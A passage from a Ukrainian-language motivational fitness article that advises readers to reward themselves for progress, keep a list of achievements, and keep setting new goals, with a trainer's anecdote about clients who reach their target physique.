Великі менеджери, великі батьки і великі тренери тварин мають одну спільну рису: всі вони знають, як змусити своїх "підлеглих" (працівників, дітей, тварин відповідно) повторювати ті речі, які їм потрібні.

Вони роблять це за допомогою заохочень.

Не забувайте заохочувати себе. Якщо ви чесно відпрацювали весь тиждень, їли чудову корисну їжу і працювали в спортклубі, чудово! Ідіть гуляти і забудьте на кілька годин про все. Робіть те, що ви хочете. Мріяли про піцу, спагетті, тортик - вперед! Їжте і не відчуває ніяких розкаянь совісті. Ви це заслужили. Балуйте себе, сходіть в дорогий магазин, купіть собі те, що хотіли купити. Зробіть те, що завжди хотіли, але не робили. Це не обов'язково може бути їжа. Це може бути все, що завгодно.


2 Тримайте список ваших досягнень під рукою

Успіх породжує ще більший успіх.
Тому ви повинні навчитися колекціонувати свої успіхи і досягнення. Ви досягнете багато-багато маленьких цілей на шляху до вашої основної мети.
апишіть їх все до останньої. Кожен раз, коли ви будете почувати провал мотивації, діставайте цей список і читайте, уявляйте і згадайте.
Це хороший спосіб розпалити мотивацію.
Через кілька місяців ви будете здивовані тим, що список такий великий, і що ви стільки всього зробили.

3. Постійно встановлюйте нові цілі

Встановлення цілей ніколи не повинний припинятися.

Я спостерігав багато людей, які після 12 місяців тренувань вставали перед дзеркалом, і я їм казав: "Ну ось один, ось воно, ось його тіло твоєї мрії, тепер воно твоє ...". Людина розгублено киває, і не знає, що йому робити далі. Цей синдром закінчення свята є якимсь шоком для багатьох. Подібно до того, як ми себе відчуваємо викинутими в той момент, коли нам вручають диплом про закінчення ВУЗу. Тому потрібно ставити собі нові цілі. Повірте, межі досконалості немає, тому почніть готуватися до наступного свята, на якому ви будете виглядати ще краще.

А тепер відкладіть цю статтю в бік і напишіть ваші цілі не завтра, не через місяць, а зараз!, Тут же, нехай навіть на клаптику паперу.

Не тягніть, пам'ятайте, що завтра настане тоді, коли ви дозволите йому наступити. Зробіть це негайно.

<попередня || наступна> ЗМІСТ

 
Харчування-здоровий спосіб життя Мотивація та цілі (3-16)